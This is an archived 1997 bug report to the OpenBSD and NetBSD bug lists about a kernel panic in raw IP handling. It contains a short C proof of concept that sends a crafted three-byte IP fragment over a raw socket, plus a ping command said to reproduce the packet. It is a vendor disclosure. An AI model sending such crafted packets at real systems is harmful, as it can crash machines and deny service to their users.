[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

panic in ip_raw

To: bugs_(_at_)_openbsd_(_dot_)_org
Subject: panic in ip_raw
From: Ficus carica <fc_(_at_)_parkone_(_dot_)_ci_(_dot_)_oakland_(_dot_)_ca_(_dot_)_us>
Date: Sun, 27 Jul 1997 15:34:05 -0700
Cc: bugs_(_at_)_netbsd_(_dot_)_org

/* As far as I understand, buf is a legal ip fragment.                 
*/
/* 1-3 bytes of fragment data will cause panic, more does not.         
*/
/* ping -pff -s2955 to some interface with an MTU of 1500 bytes        
*/
/* will recreate this packet, so I guess the the problem lies          
*/
/* somewhere before the kernel's own ip fragmentation routines.        
*/
/* I don't have a machine I can panic without consequence, so this     
*/
/* code is untested. If it doesn't work, mail me for the original.     
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

char buf[] = "\x45\x00\x00\x17\xD8\x29\x03\x33\xFF\x01\x5D\x82"
             "\x01\x02\x03\x04\x7F\x00\x00\x01\xFF\xFF\xFF";
/*                                              ^^  ^^  ^^  ?          
*/

main() {
        struct sockaddr_in thesocket;
        int sockd, on = 1;

        thesocket.sin_family = AF_INET;
        thesocket.sin_addr.s_addr = inet_addr("127.0.0.1");

        sockd = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
        setsockopt(sockd,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on));
        sendto(sockd, buf, sizeof(buf)-1, 0x0,
                (struct sockaddr *)&thesocket, sizeof(thesocket));
        close(sockd); /* hehe */
}

Prev by Date: silly bug
Previous by thread: silly bug
Index(es):
- Date
- Thread

Visit your host, monkey.org